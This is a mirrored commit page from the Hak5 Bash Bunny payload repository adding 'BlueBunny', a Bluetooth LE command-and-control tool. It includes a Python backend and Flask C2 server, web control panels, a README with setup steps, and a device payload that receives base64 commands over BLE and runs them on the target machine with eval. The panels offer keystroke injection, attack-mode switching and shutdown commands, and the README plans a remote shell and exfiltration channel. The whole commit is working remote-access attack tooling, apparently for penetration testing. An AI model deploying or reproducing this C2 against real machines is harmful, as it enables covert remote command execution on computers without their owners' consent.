hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

Browse Source
This commit is contained in:
Darkprince
2024-07-01 10:30:39 +05:30
committed by GitHub
parent 32e41527fb 9aac0c1b74
commit fb77be9253
729 changed files with 143657 additions and 24 deletions
Download Patch File Download Diff File Expand all files Collapse all files

46
payloads/library/remote_access/BlueBunny/C2/BunnyLE.py Normal file
View File

@@ -0,0 +1,46 @@
import pygatt
import base64
adapter = pygatt.GATTToolBackend()
char_uuid = '0000fff2-0000-1000-8000-00805f9b34fb'
def init():
adapter.start()
return True
def connect():
device_name = 'BlueBunny'
devices = adapter.scan(run_as_root=True)
device = next((d for d in devices if d['name'] == device_name), None)
if device:
device_address = device['address']
bunny = adapter.connect(device_address)
return bunny
else:
return False
def send(bunny, data: str, d_type: str):
if d_type == "cmd":
flag = "<CMD>"
else:
flag = "<PAYLOAD>"
data = flag + data + flag
data = base64.b64encode(data.encode("utf-8")).decode("utf-8")
if not len(data) <= 15:
data_pieces = []
for i in range(0, len(data), 15):
data_pieces.append(data[i:i + 15])
for i, piece in enumerate(data_pieces):
if i == (len(data_pieces) - 1):
bunny.char_write(char_uuid, (piece + "\n").encode("utf-8"))
else:
bunny.char_write(char_uuid, piece.encode("utf-8"))
else:
bunny.char_write(char_uuid, (data + "\n").encode("utf-8"))

61
payloads/library/remote_access/BlueBunny/C2/c2-server.py Normal file
View File

@@ -0,0 +1,61 @@
from flask import Flask, request, render_template, jsonify
import urllib.parse
import threading
import BunnyLE
app = Flask(__name__)
bb = None
connection = 0
con_fail_count = 0
def connect_bunny():
global bb
global connection
global con_fail_count
BunnyLE.init()
current_try = BunnyLE.connect()
if not current_try == False:
bb = current_try
connection = 1
else:
con_fail_count += 1
connection = 2
@app.route("/", methods=['GET', 'POST'])
def index():
if request.method == 'POST':
global bb
query = request.form.get('query')
mode = request.form.get('mode')
BunnyLE.send(bb, query, mode)
return render_template("index.html")
@app.route("/connect", methods=['GET'])
def connect():
connect_thread = threading.Thread(target=connect_bunny)
connect_thread.start()
return render_template("connecting.html")
@app.route("/con-check", methods=['GET'])
def connectCheck():
global con_fail_count
if connection == 0:
return jsonify(connected=0)
elif connection == 1:
return jsonify(connected=1)
elif connection == 2:
if con_fail_count < 5:
connect_bunny()
return jsonify(connected=0)
else:
return jsonify(connected=2)
if __name__ == '__main__':
app.run(host="localhost", port=1472, debug=True)

BIN
payloads/library/remote_access/BlueBunny/C2/static/bb_icon.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.7 KiB

BIN
payloads/library/remote_access/BlueBunny/C2/static/bb_icon_original.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.8 KiB

7
payloads/library/remote_access/BlueBunny/C2/static/bootstrap.min.css vendored Normal file
View File

File diff suppressed because one or more lines are too long

BIN
payloads/library/remote_access/BlueBunny/C2/static/logo.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 44 KiB

163
payloads/library/remote_access/BlueBunny/C2/templates/connecting.html Normal file
View File

@@ -0,0 +1,163 @@
<!DOCTYPE html>
<html>
<head>
<link rel="SHORTCUT ICON" type="image/x-icon" href="static/bb_icon.png"/>
<link rel="icon" type="image/x-icon" href="static/bb_icon.png" />
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>BlueBunny</title>
<meta name="description" content="Remote control your Bash Bunny MKII">
<link href="static/bootstrap.min.css" rel="stylesheet">
<style type="text/css">
.btn-imp {
--bs-btn-color: #EC1A24 !important;
--bs-btn-border-color: #EC1A24 !important;
--bs-btn-hover-border-color: #1a62ec !important;
--bs-btn-hover-bg: #1a62ec !important;
--bs-btn-hover-color: #ffffff !important;
}
@keyframes spinner {
0% {transform: rotate( 0deg ) scale( 1 );}
100% {transform: rotate( 360deg ) scale( 1 );}
};
</style>
<script type="text/javascript">
let fail_counter = 0
function tryAgain() {
document.getElementById("action").innerHTML = '<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Connecting your Bash Bunny...</h3><div class="text-center" style="margin-top: 100px;"><a class="btn btn-imp" title="Connect" href="/connect" id="connectBtn">Too many fails occured... Try again</a><br><br><p class="fw-bold">OR</p></div><ul style="margin-bottom: 100px;"><li>Make sure your bluetooth adapter is running properly</li><li>Restart your Bash Bunny via unplugging and plugging it back in</li><li>Restart the BlueBunny C2 server\'s operating system</li></ul><p>Please be patient - Making BLE connections can be buggy. It\'s likely a temporary problem that will be gone in a minute.</p>'
}
function connectionCheck() {
fetch("/con-check").then(function(response) {
return response.json();
}).then(function(data) {
if (data.connected == 1) {
window.location.replace("/");
} else if (data.connected == 2) {
tryAgain();
}
})
}
setInterval(connectionCheck, 5000);
</script>
</head>
<body style="background-color: #202124; color: #adb5bd; height: 100%; overflow: hidden">
<div style="filter: blur(2.5px); position: absolute; width: 100%; height: 100%;">
<nav class="navbar navbar-expand navbar-light fixed-top shadow-sm" style="border-bottom: solid; border-color: #1a62ec; border-width: 2.5px; background: #202124;">
<div class="container-fluid">
<a class="navbar-brand">
<img src="static/logo.png" style="height: 45px; padding-right: 15px; filter: brightness(0) saturate(100%) invert(23%) sepia(75%) saturate(3313%) hue-rotate(217deg) brightness(99%) contrast(86%);" class="d-inline-block">
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarToggler">
<ul class="nav ms-auto">
<li class="nav-item">
<button class="btn" title="Connect" disabled>Connect to Bash Bunny</button>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a>©</a>
</li>
</ul>
</div>
</div>
</nav>
<nav class="navbar navbar-expand-lg navbar-light" style="visibility: hidden;">
<div class="container-fluid">
<a class="navbar-brand" href="#">
<img src="static/bb_icon.png" style="height: 45px; padding-right: 15px;" class="d-inline-block"><span style="vertical-align: middle;">BlueBunny</span>
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse">
<ul class="nav">
<li class="nav-item">
<a class="btn">Connect to Bash Bunny</a>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a>©</a>
</li>
</ul>
<ul class="nav ms-auto">
<li class="nav-item">
<a class="nav-link">©</a>
</li>
</ul>
</div>
</div>
</nav>
<br>
<br>
<div class="container" style="display: flex; flex-flow: wrap; justify-content: start;">
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Payload One-Liner <p class="text-dark-emphasis" style="font-size: 15px;"><small>Run a single line of code</small></p></h4>
<div class="input-group mb-3">
<input type="text" class="form-control" placeholder="Q ALT F4" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<button class="btn">Run</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Payload Script <p class="text-dark-emphasis" style="font-size: 15px;"><small>Upload and execute a payload file</small></p></h4>
<div class="input-group mb-3">
<input type="file" class="form-control" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
</div>
<button class="btn">Execute Payload</button>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Attack Mode <p class="text-dark-emphasis" style="font-size: 15px;"><small>Configure Ethernet, Storage, HID and Serial</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<option selected>None</option>
</select>
<button class="btn">Update</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">LED <p class="text-dark-emphasis" style="font-size: 15px;"><small>Light up your Bush Bunny</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option selected>Green</option>
</select>
<button class="btn">Update</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">CPU <p class="text-dark-emphasis" style="font-size: 15px;"><small>Tune the CPU to your needs</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<option selected>Quad Core Ondemand (Default)</option>
</select>
<button class="btn">Update</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Power <p class="text-dark-emphasis" style="font-size: 15px;"><small>Take a break</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #EC1A24; color: #adb5bd;">
<option selected>Shutdown</option>
</select>
<button class="btn btn-imp">Initialize</button>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;">
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Connecting your Bash Bunny...</h3>
<div class="text-center" style="margin-top: 100px; margin-bottom: 100px;">
<img src="static/bb_icon.png" style="height: 5rem; width: 5rem; animation-name: spinner; animation-duration: 1s; animation-delay: 1s; animation-iteration-count: infinite;">
</div>
<p>This can take some time. Make sure your Bash Bunny is nearby and the BlueBunny payload is running successfully (Green LED).</p>
</div>
</div>
</div>
</div>
</body>
</html>

337
payloads/library/remote_access/BlueBunny/C2/templates/index.html Normal file
View File

@@ -0,0 +1,337 @@
<!DOCTYPE html>
<html>
<head>
<link rel="SHORTCUT ICON" type="image/x-icon" href="static/bb_icon.png"/>
<link rel="icon" type="image/x-icon" href="static/bb_icon.png" />
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>BlueBunny</title>
<meta name="description" content="Remote control your Bash Bunny MKII">
<link href="static/bootstrap.min.css" rel="stylesheet">
<style type="text/css">
.btn-imp {
--bs-btn-color: #EC1A24 !important;
--bs-btn-border-color: #EC1A24 !important;
--bs-btn-hover-border-color: #1a62ec !important;
--bs-btn-hover-bg: #1a62ec !important;
--bs-btn-hover-color: #ffffff !important;
}
.btn {
--bs-btn-color: #1a62ec;
--bs-btn-border-color: #1a62ec;
--bs-btn-hover-border-color: #1a62ec;
--bs-btn-hover-bg: #1a62ec;
--bs-btn-hover-color: #ffffff;
}
code {
color: #1a62ec;
}
.form-control::placeholder {
color: #adb5bd;
opacity: 0.5;
}
</style>
<script type="text/javascript">
function disableControl() {
forms = document.getElementsByClassName('form');
for (i = 0; i < forms.length; i++) {
forms[i].getElementsByTagName('form')[0].hidden = true;
forms[i].getElementsByTagName('h6')[0].hidden = false;
}
}
function enableControl() {
forms = document.getElementsByClassName('form');
for (i = 0; i < forms.length; i++) {
forms[i].getElementsByTagName('h6')[0].hidden = true;
forms[i].getElementsByTagName('form')[0].hidden = false;
}
}
function connectionCheck() {
fetch("/con-check").then(function(response) {
return response.json();
}).then(function(data) {
if (data.connected == 0 || data.connected == 2) {
document.getElementById("connectBtn").hidden = false;
disableControl();
} else if (data.connected == 1) {
document.getElementById("connectBtn").hidden = true;
enableControl();
}
})
}
function info(topic) {
window.scrollTo(0, 0);
document.getElementsByTagName("BODY")[0].style["overflow"] = "hidden";
document.getElementById("page").style["filter"] = "blur(2.5px)";
document.getElementById("page").style["position"] = "absolute";
document.getElementById("page").style["width"] = "100%";
document.getElementById("page").style["height"] = "100%";
document.getElementById(topic).hidden = false;
}
function infoClose(topic) {
document.getElementsByTagName("BODY")[0].style["overflow"] = null;
document.getElementById("page").style["filter"] = null;
document.getElementById("page").style["position"] = null;
document.getElementById("page").style["width"] = null;
document.getElementById("page").style["height"] = null;
document.getElementById(topic).hidden = true;
}
function execPayloadFile() {
const reader = new FileReader();
reader.readAsText(document.getElementById("payloadFile").files[0]);
reader.onloadend = () => {
query = reader.result;
document.getElementById("payloadContent").value = query;
document.getElementById("payloadForm").submit();
};
}
connectionCheck()
setInterval(connectionCheck, 10000);
</script>
</head>
<body style="background-color: #202124; color: #adb5bd; height: 100%">
<div id="page">
<div>
<nav class="navbar navbar-expand navbar-light fixed-top shadow-sm" style="border-bottom: solid; border-color: #1a62ec; border-width: 2px; background: #202124;">
<div class="container-fluid">
<a class="navbar-brand">
<img src="static/logo.png" onclick="info('info_cp')" style="cursor: pointer; height: 45px; padding-right: 15px; padding-bottom: 5px; filter: brightness(0) saturate(100%) invert(23%) sepia(75%) saturate(3313%) hue-rotate(217deg) brightness(99%) contrast(86%);" class="d-inline-block">
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarToggler">
<ul class="nav ms-auto">
<li class="nav-item">
<a class="btn btn-imp" title="Connect" href="/connect" id="connectBtn" hidden>Connect to Bash Bunny</a>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a style="cursor: pointer; font-size: 1.25rem;" title="Copyright & Attribution" onclick="info('info_cp')">©</a>
</li>
</ul>
</div>
</div>
</nav>
<nav class="navbar navbar-expand-lg navbar-light" style="visibility: hidden;">
<div class="container-fluid">
<a class="navbar-brand" href="#">
<img src="static/bb_icon.png" style="height: 45px; padding-right: 15px;" class="d-inline-block"><span style="vertical-align: middle;">BlueBunny</span>
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse">
<ul class="nav">
<li class="nav-item">
<a class="btn">Connect to Bash Bunny</a>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a>©</a>
</li>
</ul>
</div>
</div>
</nav>
</div>
<br>
<br>
<div class="container" style="display: flex; flex-flow: wrap; justify-content: start;">
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Payload One-Liner <p class="text-dark-emphasis" style="font-size: 15px;"><small>Run a single line of code</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group mb-3">
<input type="text" class="form-control" placeholder="Q ALT F4" autocomplete="off" list="datalistOptions" name="query" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<datalist id="datalistOptions">
<option value="Q STRING Hello World!"></option>
<option value="Q CAPSLOCK"></option>
<option value="Q ALT F4"></option>
<option value="Q COMMAND q"></option>
<option value="Q WIN r"></option>
<option value="Q COMMAND SPACE"></option>
</datalist>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Run</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Payload Script<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_payload')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Upload and execute a payload file</small></p></h4>
<div class="form">
<form hidden>
<div class="input-group mb-3">
<input type="file" accept=".txt" class="form-control" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" id="payloadFile">
</div>
<button class="btn" title="Execute Payload" onclick="execPayloadFile()">Execute Payload</button>
</form>
<form action="" method="POST" id="payloadForm">
<input type="hidden" name="mode" value="cmd">
<input type="hidden" name="query" value="" id="payloadContent">
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Attack Mode<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_attackmode')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Configure Ethernet, Storage, HID and Serial</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option value="ATTACKMODE OFF" selected>None</option>
<option value="ATTACKMODE SERIAL">SERIAL</option>
<option value="ATTACKMODE ECM_ETHERNET">ECM ETHERNET</option>
<option value="ATTACKMODE RNDIS_ETHERNET">RNDIS ETHERNET</option>
<option value="ATTACKMODE AUTO_ETHERNET">AUTO ETHERNET</option>
<option value="ATTACKMODE STORAGE">STORAGE</option>
<option value="ATTACKMODE HID">HID</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Update</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">LED <p class="text-dark-emphasis" style="font-size: 15px;"><small>Light up your Bush Bunny</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option value="LED G" selected>Green</option>
<option value="LED B">Blue</option>
<option value="LED R">Red</option>
<option value="LED Y">Yellow</option>
<option value="LED C">Cyan</option>
<option value="LED M">Magenta</option>
<option value="LED W">White</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Update</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">CPU Control <p class="text-dark-emphasis" style="font-size: 15px;"><small>Tune the CPU to your needs</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option value="CUCUMBER ENABLE">Single Core Ondemand (Low Power)</option>
<option value="CUCUMBER DISABLE" selected>Quad Core Ondemand (Default)</option>
<option value="CUCUMBER PLAID">Quad Core Performance (High Performance)</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Update</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Power Management<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_power')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Take a break</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #EC1A24; color: #adb5bd;" name="query">
<option value="shutdown -h now" selected>Shutdown</option>
<option value="reboot">Reboot</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn btn-imp" type="submit">Initialize</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_payload" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Payload Script</h3>
<p>This section allows you to execute custom payload files.</p>
<p>The name of the uploaded file doesn't have to match <code>payload.txt</code>.</p>
<p>Uploaded payloads will be sent to your Bash Bunny and will be saved temporary. After finishing your payload, it gets removed automatically.
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_payload')">Close</button>
</div>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_attackmode" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Attack Mode</h3>
<p>This section allows you to change the Bash Bunny's attack mode like the <code>ATTACKMODE</code> payload command does.</p>
<p>Further and more complex attack mode combinations can always be set from the "Payload One-Liner" or a payload file.</p>
<p class="fw-bold">Important:</p>
<p>When setting the attack mode, you likely can't change it without a reboot (besides disabling it again). The target machine may not recognize the change, for example, from STORAGE to HID. It may no longer detect the storage but won't be able to recognize the HID. Keep in mind: This can differ between target devices.</p>
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_attackmode')">Close</button>
</div>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_power" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Power Management</h3>
<p>This section allows you to shutdown or reboot your Bash Bunny.</p>
<p>After reboot, your Bash Bunny will run the payload available at the current switch position.</p>
<p>Rebooting may help when you encouter execution issues. When the attacked device won't recognize attack mode changes, rebooting and then setting the new attack mode will fix it.</p>
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_power')">Close</button>
</div>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_cp" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Copyright & Attribution</h3>
<br>
<img src="static/logo.png" style="height: 45px; padding-right: 15px; padding-bottom: 5px;" class="d-inline-block">
<p>BlueBunny is an open source project from <code><a href="https://github.com/90N45-d3v">90N45</a></code>.<br>It is licensed under the MIT license and should be treated as such.</p>
<br>
<img src="static/bb_icon_original.png" style="height: 45px; padding-right: 15px; padding-bottom: 5px;" class="d-inline-block">
<p>Bash Bunny is a trademark of Hak5 LLC.<br>Visit <code><a href="https://hak5.org">hak5.org</a></code> for more.</p>
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_cp')">Close</button>
</div>
</div>
</div>
</div>
</div>
</body>
</html>

92
payloads/library/remote_access/BlueBunny/README.md Normal file
View File

@@ -0,0 +1,92 @@
![BlueBunny-Banner](https://github.com/90N45-d3v/BlueBunny/assets/79598596/fae0b5ca-6b38-41b3-a5fc-7aa3cabea369)
<p align="center">
<img src="https://img.shields.io/badge/Made%20with-Python-blue">
<img src="https://img.shields.io/github/license/90N45-d3v/BlueBunny.svg">
<img src="https://img.shields.io/badge/Ask%20me-anything-1abc9c.svg">
<br>
<img src="https://img.shields.io/badge/-Linux-lightblue">
</p>
<p align="center">
C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.<br>Send your Bash Bunny all the instructions it needs just over the air.
</p>
* Author: 90N45
* Version: 1.0
* Category: Remote
* Attackmodes: NONE (Custom)
## Table of contents
- [Overview](https://github.com/90N45-d3v/BlueBunny#overview)
- [Installation & Start](https://github.com/90N45-d3v/BlueBunny#installation--start)
- [Manual communication with the Bash Bunny through Python](https://github.com/90N45-d3v/BlueBunny#manual-communication-with-the-bash-bunny-through-python)
- [Troubleshooting](https://github.com/90N45-d3v/BlueBunny#troubleshooting)
- [Working on...](https://github.com/90N45-d3v/BlueBunny#working-on)
- [Additional information](https://github.com/90N45-d3v/BlueBunny#additional-information)
## Overview
#### Structure
![BlueBunny-Structure](https://github.com/90N45-d3v/BlueBunny/assets/79598596/3004fb10-feef-45c8-8624-1393c2fb7288)
## Installation & Start
1. Install required dependencies
````
pip install pygatt "pygatt[GATTTOOL]"
````
Make sure [BlueZ](http://www.bluez.org/download/) is installed and `gatttool` is usable
````
sudo apt install bluez
````
2. Download the `BlueBunny` folder and switch into the `BlueBunny/C2` folder
````
cd BlueBunny/C2
````
3. Start the C2 server
````
sudo python c2-server.py
````
4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: `BlueBunny/payload.txt`).
5. Visit your C2 server from your browser on `localhost:1472` and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).
## Manual communication with the Bash Bunny through Python
You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.
#### Example Code
````python
# Import the backend (BlueBunny/C2/BunnyLE.py)
import BunnyLE
# Define the data to send
data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
d_type = "cmd"
# Initialize BunnyLE
BunnyLE.init()
# Connect to your Bash Bunny
bb = BunnyLE.connect()
# Send the data and let it execute
BunnyLE.send(bb, data, d_type)
````
## Troubleshooting
#### Connecting your Bash Bunny doesn't work? Try the following instructions:
- Try connecting a few more times
- Check if your bluetooth adapter is available
- Restart the system your C2 server is running on
- Check if your Bash Bunny is running the BlueBunny payload properly
- How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?
#### Bugs within BlueZ
The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.
- Timeout after 5.0 seconds
- Unknown error while scanning for BLE devices
## Working on...
- Remote shell access
- BLE exfiltration channel
- Improved connecting process
## Additional information
As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.

63
payloads/library/remote_access/BlueBunny/payload.txt Normal file
View File

@@ -0,0 +1,63 @@
#!/bin/bash
#
# Title: BlueBunny
# Description: BLE based C2 server for the Bash Bunny Mark II
# Author: 90N45
# Version: 1.0
# Category: Remote
# Attackmodes: NONE (Custom)
LED SETUP
# Enable serial BLE module
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
# Configure BLE module as slave
echo -n -e "AT+ROLE=0" > /dev/ttyS1
echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1
echo -n -e "AT+ADV=1" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
LED FINISH
while [[ true ]]; do
# Get incomming data from serial port
data=$(head -1 /dev/ttyS1)
# Decode base64 encoded data
data=$(echo ${data} | base64 -d)
# Echo data for debugging
echo "Debugger: ${data}"
# Single command
if [[ $data =~ "<CMD>" ]]; then
# Extract command
command=${data#*<CMD>}
command=${command%%<CMD>*}
# Run recieved command
eval "${command}"
fi
# Payload file
if [[ $data =~ "<PAYLOAD>" ]]; then
# Set payload file name
file="BlueBunnyPayload-${RANDOM}.txt"
# Extract file content
content=${data#*<PAYLOAD>}
content=${content%%<PAYLOAD>*}
# Write content to file
printf "${content}" > "${file}";
# Run payload
bash $file
# Remove payload file
rm $file
fi
done

36
